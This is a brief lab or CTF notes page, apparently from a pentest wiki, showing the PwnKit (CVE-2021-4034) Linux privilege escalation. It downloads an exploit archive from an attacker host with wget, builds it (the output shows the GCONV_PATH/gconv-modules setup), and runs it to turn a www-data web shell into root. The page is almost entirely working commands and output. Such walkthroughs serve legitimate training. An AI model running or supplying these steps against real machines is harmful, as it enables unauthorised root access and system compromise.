♟️pwnkit CVE-2021-4034 Linux PrivEsc

d'abord télécharger le zip de la cve 2021-4034 sur Github
puis:
$ wget http://attacker.thm:8000/pwnkit.zip

--[redacted]-- http://attacker.thm:8000/pwnkit.zip
Connecting to attacker.thm:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6457 (6.3K) [application/zip]
Saving to: 'pwnkit.zip'0K ...... 100% 2.42M=0.003s[redacted] (2.42 MB/s) - 'pwnkit.zip' saved [6457/6457]

$ unzip pwnkit.zip

Archive: pwnkit.zip
55d60e381ef90463ed35f47af44bf7e2fbc150d4
creating: CVE-2021-4034-main/
inflating: CVE-2021-4034-main/.gitignore
inflating: CVE-2021-4034-main/LICENSE
inflating: CVE-2021-4034-main/Makefile
inflating: CVE-2021-4034-main/README.md
inflating: CVE-2021-4034-main/cve-2021-4034.c
inflating: CVE-2021-4034-main/cve-2021-4034.sh
creating: CVE-2021-4034-main/dry-run/
inflating: CVE-2021-4034-main/dry-run/Makefile
inflating: CVE-2021-4034-main/dry-run/dry-run-cve-2021-4034.c
inflating: CVE-2021-4034-main/dry-run/pwnkit-dry-run.c
inflating: CVE-2021-4034-main/pwnkit.c

$ cd CVE-2021-4034-main/

$ pwd
/var/www/html/CVE-2021-4034-main

$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true GCONV_PATH=./pwnkit.so:.

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

$ ls
GCONV_PATH=.
LICENSE
Makefile
README.md
cve-2021-4034
cve-2021-4034.c
cve-2021-4034.sh
dry-run
gconv-modules
pwnkit.c
pwnkit.so

$ ./cve-2021-4034
# id
uid=0(root) gid=0(root) groups=0(root),33(www-dat
PreviousENUM4Linux Nextjoomla
Last updated 1 year ago